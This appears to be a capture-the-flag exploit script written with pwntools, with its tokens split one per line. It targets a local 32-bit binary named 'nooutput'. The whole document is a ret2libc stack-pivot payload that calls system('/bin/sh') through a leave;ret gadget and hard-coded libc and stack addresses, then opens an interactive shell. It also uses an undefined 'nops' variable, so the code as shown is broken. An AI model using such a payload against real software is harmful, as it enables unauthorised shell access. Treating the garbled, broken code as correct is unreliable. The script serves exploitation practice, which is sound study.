from
pwn
import
*
context(arch
=
'i386'
, os
=
'linux'
)
context.terminal
=
[
'/usr/bin/tmux'
,
'splitw'
,
'-h'
]
leaveret_add
=
0x08048514
p
=
process(
'./nooutput'
)
lib
=
ELF(
"/usr/lib32/libc.so.6"
)
libc_base
=
0xf7dcd000
p.readuntil(
'Something:\n'
)
stackAddr
=
0xffffd498
log.info(
hex
(stackAddr))
sysAddr
=
libc_base
+
lib.symbols[
'system'
]
exitAddr
=
libc_base
+
lib.symbols[
'exit'
]
binsh
=
libc_base
+
lib.search(
"/bin/sh"
).
next
()
exploit
=
p32(
0x90909090
)
exploit
+
=
p32(sysAddr)
exploit
+
=
p32(exitAddr)
exploit
+
=
p32(binsh)
exploit
+
=
nops
*
(
0x100
-
len
(exploit))
exploit
+
=
p32(stackAddr)
exploit
+
=
p32(leaveret_add)
p.sendline( exploit)
p.interactive()